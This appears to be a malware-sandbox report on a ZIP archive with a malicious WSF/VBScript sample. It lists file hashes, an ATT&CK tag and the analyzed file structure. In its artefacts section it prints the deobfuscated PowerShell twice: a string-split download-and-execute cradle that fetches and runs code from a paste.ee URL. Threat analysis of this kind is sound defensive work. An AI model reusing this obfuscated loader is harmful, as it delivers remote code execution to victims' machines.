Malicious
Malicious

4614600c11d5149be251283e722d32726cb20c[...]d23.zip

ZIP Archive
|
MD5: 07bc1d10c2f5d35351d6e519309ef0b3
|
Size: 3.24 KB
|
application/zip

Zip Archive
WSF File
VBScript
T1059.005
PowerShell
Batch Command
PowerShell Call
Wscript.Shell
DeObfuscated
Obfuscated
Print
General
Structural Analysis
Config.0
Yara Rules16
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
07bc1d10c2f5d35351d6e519309ef0b3
Sha1
156c1a9069df9c2356ac38eaa09b627abe38a9c1
Sha256
242c8233fb25e6a0a5add89e66dda791543e80a4e5df0b6e8e614c4bb8fa41b0
Sha384
fbd0f754d91c65dee2c037edae923269bc0658b1ab11bfb03906f45b5775caeee6d56c26d260229b93b35313c7e9263b
Sha512
9548d27be4048b65ec01d2aa6c1d0e6cbecccb0482a60f1956fff9608c493dd52f8f862649c80b005e543a6360b543a03c1d4a2b4d9130e9771d47bc539adbde
SSDeep
96:RA4dKdC1b42DJIllDk9scFj9atEgBNIqXU:7kElDizk97tWEgBNE
TLSH
7F612B111D7CFA70D4C29A77B19DA6A0D5AC13DC205572CB244C06B21E225B7CFDB5AB
File Structure
4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.zip
Zip Archive
WSF File
VBScript
T1059.005
PowerShell
Batch Command
PowerShell Call
Wscript.Shell
DeObfuscated
Obfuscated
Malicious
4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.bin
Archive Entry
Html
WSF File
VBScript
T1059.005
PowerShell
Batch Command
PowerShell Call
Wscript.Shell
DeObfuscated
Obfuscated
Malicious
[Job Id=manage-quskzyjvyx Name=No Name]
Malicious
[VBScript] #0
VBScript
T1059.005
PowerShell
Batch Command
PowerShell Call
Wscript.Shell
DeObfuscated
Obfuscated
Malicious
[VBScript] #0.deobfuscated.vbs
DeObfuscated
VBScript
T1059.005
Malicious
[Command #0]
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$ReDrO = $R = "IeX(Ne" $RE = $R + "W-OBJ" $RED = $RE + "eCT NeT.W" $PAC = "eBCL" $xx = $PAC + "IeN" $RO = $xx + "T).DOWNLO" $zz = "ADSTRING('https://paste.ee/r/tuG3r/0')" Invoke-Expression ($RED + $RO + $zz) powershell $ReDrO
Deobfuscated PowerShell

$ReDrO = $R = "IeX(Ne" $RE = $R + "W-OBJ" $RED = $RE + "eCT NeT.W" $PAC = "eBCL" $xx = $PAC + "IeN" $RO = $xx + "T).DOWNLO" $zz = "ADSTRING('https://paste.ee/r/tuG3r/0')" Invoke-Expression ($RED + $RO + $zz) powershell $ReDrO
4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.zip (3.24 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙